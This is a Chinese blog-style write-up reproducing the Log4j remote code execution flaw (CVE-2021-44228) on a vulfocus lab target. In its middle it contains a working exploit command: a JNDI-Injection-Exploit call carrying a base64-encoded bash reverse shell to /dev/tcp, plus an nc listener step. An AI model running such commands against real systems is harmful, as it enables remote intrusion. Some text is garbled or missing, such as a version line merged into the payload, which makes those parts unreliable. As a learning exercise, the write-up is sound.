2021/12/09，阿里云安全团队向apache报告了由log4j日志引起的远程代码执行，12月10日，当天白帽跟提前过大年似的，疯狂刷src(利用超级简单)，让部分src平台暂时停止收类似该漏洞，凌晨，很多程序员和安全员被迫起来应急响应，几乎市面上的大厂都受到了该漏洞的影响

这里做一个复现学习的小文章，由于对java这方面的知识雀食是薄弱，而且本地复现时，出现了挺多问题，在本地复现时,不知道是什么原因，利用payload去打的时候，总是说loggxxx模块不存在...idea也犯毛病...果断直接用网上的靶机去复现一波

漏洞信息

漏洞名称

Apche log4j远程代码执行漏洞

漏洞编码

CVE-2021-44228

漏洞危害

严重

漏洞时间

2021/12/10

受影响版本

Apache Log4j 2.x &1 ---> YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2NiAwPiYx java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2NiAwPiYx}|{base64,-d}|bash" -A 127.0.0.1 注意:根据自身情况调整payload6.打开监听

另起终端，打开nc -lvp 端口 进行监听

vulfocus的靶机，用类似下面这个payload

注意，2021/12/10 360漏洞云发布二次通告预警，官方发布的修复rc1版本仍然可以绕过，请使用该版本的的用户尽快升级至rc2

所有漏洞复现文章仅供学习交流使用，禁止用于非法用途!!!!!!!!!!!!!!!!!!